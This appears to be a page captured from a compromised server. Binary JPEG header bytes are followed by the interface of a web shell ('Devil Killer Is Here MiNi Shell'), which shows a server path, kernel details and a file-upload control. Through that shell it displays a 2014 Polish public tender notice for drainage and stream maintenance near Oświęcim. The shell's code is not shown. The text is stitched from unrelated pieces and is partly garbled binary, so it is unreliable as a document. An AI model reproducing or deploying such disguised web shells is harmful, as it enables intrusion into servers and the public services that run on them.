JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140617/204106-N-2014.html

<p class="kh_header"><b>Oświęcim: Konserwacja urządzeń melioracji podstawowych na terenie Inspektoratu Rejonowego w Oświęcimiu (4 części zamówienia)</b><br>
<b>Numer ogłoszenia: 204106 - 2014; data zamieszczenia: 17.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych w Krakowie Inspektora Rejonowy Oświęcim , ul. Strzelecka 10, 32-600 Oświęcim, woj. małopolskie, tel. 033 8431941, faks 033 8431941.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:www.mzmiuw.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja urządzeń melioracji podstawowych na terenie Inspektoratu Rejonowego w Oświęcimiu (4 części zamówienia).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja usług związanych z wykonaniem prac konserwacyjnych na urządzeniach melioracji wodnych podstawowych na terenie Inspektoratu Rejonowego w Oświęcimiu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 Ustawy: posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy posiadają wiedzę i doświadczenie do wykonania zamówienia: Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, co najmniej 1 usługę (z załączeniem dowodów, że usługa ta została wykonana należycie).
Wartość usługi nie może być mniejsza niż:
a)	dla części 1 zamówienia- 30 000,00 zł (słownie: trzydzieści tysięcy złotych 00/100) w zakresie konserwacji rzek lub potoków.
b)	dla części 2 zamówienia - 25 000,00 zł (słownie: dwadzieścia pięć tysięcy złotych 00/100) w zakresie konserwacji rzek lub potoków.
c)	dla części 3 zamówienia - 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100) w zakresie konserwacji rzek lub potoków.
d)	dla części 4 zamówienia - 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100) w zakresie konserwacji rzek lub potoków.
Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia: warunek ten zostanie spełniony jeżeli wykonawca wykaże, że: dysponują osobami posiadającymi kwalifikacje konieczne do realizacji zamówienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 ( tj. Dz. U.  2010 r., Nr 243, poz. 1623 z późn. zm.), to jest osobami lub osobą posiadającą uprawnienia budowlane do kierowania robotami w specjalności: konstrukcyjno - budowlanej obiektów budowlanych gospodarki wodnej i melioracji wodnych lub odpowiadające im równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych, która pełnić będzie obowiązki kierownika budowy składając stosowne oświadczenie.
Samodzielna funkcja techniczna może być pełniona także przez osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w Ustawie z dnia 18.03.2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 17.4.2008 r. nr 63, poz. 394).
POWYŻSZY WARUNEK DOTYCZY WYŁĄCZNIE 1 CZĘŚCI ZAMÓWIENIA
Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że: jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia.
Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy załączyć:
1). dokumenty, o których mowa w Rozdziale VI siwz
2). pełnomocnictwa, w przypadkach określonych w ust. 9 i ust. 12 niniejszego Rozdziału,
3). zaakceptowany (zaparafowany na każdej stronie) wzór umowy wraz z załącznikami, stanowiący załącznik nr 6a dla 1 części zamówienia oraz załącznik nr 6b dla 2, 3. 4 części zamówienia.
4). wypełniony druk Przedmiar robót, który jest podstawą do obliczenia ceny oferty stanowiący załącznik nr 10 do siwz (do oferty należy załączyć kosztorys uproszczony wypełniony zgodnie z drukiem Przedmiar robót, bez dodawania żadnych dodatkowych pozycji).
5) listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej zgodnie z załącznikiem nr 9 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmianę treści umowy zawartej z Wykonawcą tylko w następujących przypadkach:
a). zmiany w KRS, wpisie do ewidencji działalności gospodarczej lub (CEIDG) w trakcie realizacji zamówienia. 
b). zmiany kont bankowych,	
c). wystąpienie oczywistych omyłek pisarskich  i rachunkowych w treści umowy,
d). w przypadku ustawowej zmiany stawki podatku od towarów i usług na przedmiot umowy, cena brutto określona w umowie ulegnie odpowiedniej zmianie, przy czym cena netto pozostanie niezmieniona,
e). obniżenia wynagrodzenia, o którym mowa §3 ust.1,
f). zmian regulacji prawnych obowiązujących w dniu podpisania umowy lub po jej podpisaniu,
g)	zgodnie z art. 144 ust.1 ustawy Prawo zamówień publicznych - dopuszcza się możliwość wprowadzenia innych, nieistotnych zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy,
h)	zmiany terminu wykonania Umowy z zastrzeżeniem ust. 3.
2. Zmiana terminu wykonania przedmiotu zamówienia będzie możliwa wyłącznie w przypadku:
a) konieczności udzielenia zamówień dodatkowych w rozumieniu art. 67 ust. 1 pkt. 5 ustawy Prawo zamówień publicznych, których wykonanie rzutuje na termin wykonania zamówienia podstawowego 
b) zdarzeń losowych tj. podtopienia terenu, na którym jest wykonywana umowa, spowodowanego powodzią lub intensywnymi opadami deszczu, tylko jeśli uniemożliwia to prowadzenie robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzmiuw.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych w Krakowie Inspektorat Rejonowy Oświęcim, ul. Strzelecka 10, 32-600 Oświęcim.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2014 godzina 09:00, miejsce: Małopolski Zarząd Melioracji i Urządzeń Wodnych w Krakowie Inspektorat Rejonowy Oświęcim, ul. Strzelecka 10, 32-600 Oświęcim - Dziennik Podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Konserwacja urządzeń melioracji podstawowych:
1.Nieuregulowany potok Marcyporębski w km 10+900-10+920 w msc. Lgota, gm. Brzeźnica, pow. wadowicki.
2.Nieuregulowany potok Półwiejski w km 1+460-2+381 w msc. Ryczów, Półwieś, gm. Spytkowice, pow. wadowicki.
3.Uregulowany potok Brzeźnicki w km 0+000-2+141 w msc. Brzeźnica, gm. Brzeźnica, pow. wadowicki.
4.Nieuregulowany potok Brzeźnicki w km 8+360-8+400, 9+060-9+110 w msc. Marcyporęba, gm. Brzeźnica, pow. wadowicki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Nieuregulowany potok Marcyporębski w km 10+900-10+920 w msc. Lgota, gm. Brzeźnica, pow. wadowicki.
Wykoszenie porostów ręcznie ze skarp wraz z wygrabieniem i złożeniem poza górną krawędź skarpy,Wykonanie wykopów pod ubezpieczenia,Wykonanie narzutu kamiennego na wyściółce z faszyny o gr. warstwy 25 cm,Plantowanie.
2.Nieuregulowany potok Półwiejski w km 1+460-2+381 w msc. Ryczów, Półwieś, gm. Spytkowice, pow. wadowicki.
Ręczne ścinanie i karczowanie zakrzaczeń z lewej i prawej skarpy w km 0+010-2+000 z rozdrobnieniem na miejscu, Usunięcie zatorów i odsypisk oraz ścięcie nawisów brzegowych wraz z rozplantowaniem na skarpach w km 0+000-2+141, 
3.Uregulowany potok Brzeźnicki w km 0+000-2+141 w msc. Brzeźnica, gm. Brzeźnica, pow. wadowicki.
Wykoszenie porostów ręcznie ze skarp wraz z wygrabieniem poza górną krawędź skarpy w km 0+000-2+141, Ręczne ścinanie i karczowanie zakrzaczeń z lewej i prawej skarpy potoku,	Usuwanie zatorów w dnie potoku wraz ze złożeniem urobku poza górną krawędź skarpy, w km 0+000-2+141, 
4.Nieuregulowany potok Brzeźnicki w km 8+360-8+400, 9+060-9+110 w msc. Marcyporęba, gm. Brzeźnica, pow. wadowicki.
Km 8+360-8+400: Remont wyściółek z faszyny, grubość warstwy 25 cm z fundowaniem w dnie i na skarpach z przysypaniem urobku wydobytym z dna, 	Przekopanie kinety w potoku w ramach remontu z przywróceniem jego trasy do stanu pierwotnego i zasypaniem istniejącej wyrwy powodziowej.
Km 9+060-9+110: Przekopanie kinety w potoku w ramach remontu z przywróceniem jego trasy do stanu pierwotnego i zasypaniem istniejącej wyrwy powodziowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Konserwacja urządzeń melioracji podstawowych:
1.Uregulowany potok Rutka w km 4+100-6+160 w msc. Kwaczała, gm. Alwernia, pow. chrzanowski.
2.Uregulowany potok Ratowa w km 0+000-2+220 w msc. Podłęże, gm. Alwernia, pow. chrzanowski..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uregulowany potok Rutka w km 4+100-6+160 w msc. Kwaczała, gm. Alwernia, pow. chrzanowski.
Wykoszenie porostów ręcznie ze skarp potoku, Ręczne wycięcie zakrzaczeń, Wykoszenie ręczne porostów z dna potoku, Wygrabienie wykoszonych porostów z dna i skarp potoku wraz z wywiezieniem, Lokalne usunięcie zatorów z dna potoku  - gałęzie, śmieci, nanos - z załadunkiem i wywiezieniem.
2.Uregulowany potok Ratowa w km 0+000-2+220 w msc. Podłęże, gm. Alwernia, pow. chrzanowski.
Wykoszenie porostów ręcznie ze skarp wraz z wygrabieniem,Usunięcie roślin korzeniących się w dnie potoku,Udrożnienie koryta potoku w km 1+766-2+220, Ręczne rozplantowanie odkładu i wyrównanie powierzchni, Usunięcie zatorów ziemnych z dna potoku, przycięcie zwisów, likwidacja zawężeń koryta z wbudowaniem ziemi w skarpę i złożeniem urobku poza górną krawędź skarpy w km 0+000-1+516, Oczyszczenie z namułu przepustu, Fi 0,80m, zamulenie 2/3 Fi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Konserwacja urządzeń melioracji podstawowych:
1.Uregulowany potok Płazanka w km 0+000-5+100, 7+000-8+150 w msc. Jankowice, Wygiełzów, gm. Babice, pow. chrzanowski.
2.Uregulowany potok Zimna Woda w km 0+600-1+800 w msc. Mętków, gm. Babice, pow. chrzanowski..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Uregulowany potok Płazanka w km 0+000-5+100, 7+000-8+150 w msc. Jankowice, Wygiełzów, gm. Babice, pow. chrzanowski.
Km 0+000-5+100: Wykoszenie porostów ręczne ze skarp wraz z wygrabieniem, 	Ręczne ścinanie i karczowanie zakrzaczeń, Usunięcie zatorów i przetamowań w dnie, oczyszczenie płyt na skarpach potoku z nanosu z wywiezieniem,
Km 7+150-9+000: Wykoszenie porostów ręczne ze skarp wraz z wygrabieniem, 	Ręczne ścinanie i karczowanie zakrzaczeń, Oczyszczenie terenu z pozostałości po wycięciu zakrzaczeń z wywiezieniem, Usunięcie zatorów i przetamowań w dnie, oczyszczenie płyt na skarpach potoku z nanosi z wywiezieniem w km 7+200-8+000.
2.Uregulowany potok Zimna Woda w km 0+600-1+800 w msc. Mętków, gm. Babice, pow. chrzanowski.
Wykoszenie porostów ze skarp wraz z wygrabieniem w km 0+000-1+120, 6+800-7+000, 8+185-9+045, 	Ręczne ścinanie i karczowanie zakrzaczeń, 	Oczyszczenie z namułu przepustu, przepust ramowy 2,0x1,0 m, zamulenie 1/3, 	Oczyszczenie z namułu przepustu, przepust ramowy 2,0x1,5m, zamulenie 1/3, 	Usunięcie zatorów ziemnych z dna potoku, przycięcie zwisów, likwidacja zawężeń koryta, z wbudowaniem ziemi w karpę lub złożeniem urobku poza górną krawędź skarpy, Rozbiórka umocnień z pojedynczych kiszek faszynowych Fi 25 cm w km 0+900-1+100, Wymiana progów drewnianych w dnie, krawędziaki 25x30x150 cm, 	Wykonanie narzutu kamiennego w dnie przy progach z kamienia średniego, 	Wykonanie palisady, kołki Fi 7-9 cm, głębokość wbicia 1 m, Wykonanie opasek pojedynczych z kiszek faszynowych leśnych, Fi 25 cm w km 0+900-1+200, 	Obsianie skarp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p></li>
